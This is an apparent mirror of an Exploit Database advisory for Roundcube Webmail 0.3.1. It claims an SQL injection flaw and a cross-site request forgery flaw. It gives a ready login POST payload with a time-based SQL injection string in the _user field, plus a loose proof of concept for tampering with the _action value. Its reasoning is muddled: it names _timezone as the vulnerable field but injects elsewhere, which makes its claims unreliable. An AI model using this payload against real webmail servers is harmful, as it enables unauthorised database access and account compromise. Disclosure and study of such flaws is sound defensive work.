Roundcube Webmail 0.3.1 – Cross-Site Request Forgery / SQL Injection

• Exploit Database
• 12 阅读

• 作者： Smith Falcon
  日期： 2011-10-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17957/

• # Exploit Title: RoundCube 0.3.1 SQL injection
  # Date: 10/10/2011
  # Author: Smith Falcon
  # Software Link: http://roundcube.net/download
  # Version: 0.3.1
  # Tested on: Linux
  
  _timezone=
  is vulnerable to SQL Union Injection.
  
  "POST" data in
  
  http://site.com/roundcube/index.php
  
  _pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1"
  
  
  XRF vulnerable [ POC ]
  
  POST variable
  
  changing variable _action=login to "_action=anything" shows you the site is
  vulnerable to XRF attacks. When you replay it with HTTP Live headers, you
  see a logged in URL which shows the roundcube 0.3.1 is vulnerable to XRF
  attacks. Successful tampering will lead to username compromising.
  
  _action=loggedin
  
  Credits - iqZer0